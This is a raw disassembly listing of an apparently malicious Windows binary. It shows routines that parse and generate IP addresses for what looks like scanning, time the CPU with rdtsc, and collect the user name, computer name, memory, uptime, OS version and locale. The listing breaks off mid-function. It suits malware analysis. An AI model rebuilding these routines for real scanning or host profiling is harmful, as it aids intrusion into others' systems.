jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: sub_4083AD+2F2�p
; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: sub_41349C+192�p
; sub_41349C+3DA�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41F018
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset dword_418F54
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: sub_41349C+12A�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41F018
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset dword_418F54
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: sub_4083AD+3A4�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call ds:dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset off_419100
push [ebp+arg_0]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083AD proc near ; DATA XREF: sub_4087C4+35�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_734 = byte ptr -734h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_714 = dword ptr -714h
var_710 = dword ptr -710h
var_70C = dword ptr -70Ch
var_708 = byte ptr -708h
var_6F0 = dword ptr -6F0h
var_6EC = dword ptr -6ECh
var_6E8 = dword ptr -6E8h
var_6E4 = dword ptr -6E4h
var_6E0 = byte ptr -6E0h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = byte ptr -6C8h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_409 = byte ptr -409h
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_6CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_734]
push eax
call ds:dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp+var_72C]
add eax, 100000h
shr eax, 14h
mov [ebp+var_6F0], eax
mov eax, [ebp+var_728]
add eax, 100000h
shr eax, 14h
mov [ebp+var_738], eax
call sub_4092A4
mov [ebp+var_714], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_6E8], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_6E4], eax
mov [ebp+var_8], 15h
mov [ebp+var_6D0], 10h
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_708]
push eax
call ds:dword_417018 ; GetUserNameA
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_6E0]
push eax
call ds:dword_417078 ; GetComputerNameA
mov [ebp+var_520], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_51C]
rep stosd
lea eax, [ebp+var_520]
push eax
call ds:dword_417030 ; GetVersionExA
mov [ebp+var_48C], offset a? ; "?"
mov [ebp+var_710], offset aNoSp ; "no SP"
cmp [ebp+var_51C], 4
jnz short loc_408522
cmp [ebp+var_518], 0
jnz short loc_408522
cmp [ebp+var_510], 1
jnz short loc_40850A
mov [ebp+var_48C], offset a95 ; "95"
loc_40850A: ; CODE XREF: sub_4083AD+151�j
cmp [ebp+var_510], 2
jnz short loc_40851D
mov [ebp+var_48C], offset aNt ; "NT"
loc_40851D: ; CODE XREF: sub_4083AD+164�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_4083AD+13F�j
; sub_4083AD+148�j
cmp [ebp+var_51C], 4
jnz short loc_408540
cmp [ebp+var_518], 0Ah
jnz short loc_408540
mov [ebp+var_48C], offset a98 ; "98"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4083AD+17C�j
; sub_4083AD+185�j
